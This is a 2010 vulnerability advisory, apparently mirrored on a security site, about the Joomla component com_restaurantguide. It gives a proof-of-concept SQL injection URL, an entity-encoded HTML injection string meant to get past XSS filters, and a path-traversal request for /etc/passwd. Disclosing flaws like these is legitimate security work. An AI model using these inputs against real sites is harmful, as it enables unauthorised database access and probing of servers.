Joomla Restaurant Guide Cross Site Scripting / Local File Inclusion / SQL Injection

2011.10.13
Credit: Valentin Hoebel
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-4927 | CVE-2010-4928
CWE: CWE-89
CWE-79

# Exploit Title: Joomla Component com_restaurantguide Multiple Vulnerabilities # Date: 18.09.2010 # Author: Valentin # Category: webapps/0day # Version: 1.0.0 # Tested on: Debian lenny, Apache2, MySQL 5, Joomla 1.5.x # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] >> General Information Advisory/Exploit Title = Joomla Component com_restaurantguide Multiple Vulnerabilities Author = Valentin Hoebel Contact = valentin@xenuser.org [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] >> Product information Name = Restaurant Guide Vendor = Oh-Taek Im Vendor Websites = http://www.photoindochina.com/, http://extensions.joomla.org/extensions/directory-a-documentation/thematic-directory/14054 Affected Version(s) = 1.0.0 [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] >> SQL Injection index.php?option=com_restaurantguide&view=country&id='&Itemid=69 (id parameter is vulnerable) >> HTML/JS/VBS Code Injection (all input fields, also in the admin backend) It is possible to inject HTML/JS/VBS code into the document although XSS filters are active. Simply end the current HTML tag and convert your code into decimal HTMl code without semicolons: ">&#60&#65&#32&#72&#82&#69&#70&#61&#34&#104&#116&#116&#112&#58&#47&#47&#119&#119&#119&#46&#103&#111&#111&#103&#108&#101&#46&#99&#111&#109&#46&#47&#34&#62&#105&#110&#106&#101&#99&#116&#101&#100&#60&#47&#65&#62 (which is "><A HREF="http://www.google.com./">injected</A>) The code doesn't get parsed, so it is not possible to exploit this weakness. However, including arbitrary plain text into the current website is possible. Dangerous! :D >> Interesting stuff a) Triggering various error messages in the admin panel is possible, e.g.: administrator/index.php?option=com_restaurantguide&controller=restaurantitems&task=edit&cid[]=[try ' or -1 or an ID which does not exist] Sometimes the code of the component gets displayed within the browser window when you try to trigger errors with different variables. b) Playing around with the controller variable administrator/index.php?option=com_restaurantguide&controller=../../../../../../../../../etc/passwd%00 (NOT a LFI vulnerability since the controller classes are defined in the source code, you just get different error messages.. nothing to exploit here..) [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] >> Additional Information Advisory/Exploit Published = 18.09.2010 [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] >> Misc Greetz = cr4wl3r, JosS, packetstormsecurity.org [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

References:

http://www.exploit-db.com/exploits/15040
http://packetstormsecurity.org/1009-exploits/joomlarestaurantguide-sqlxsslfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top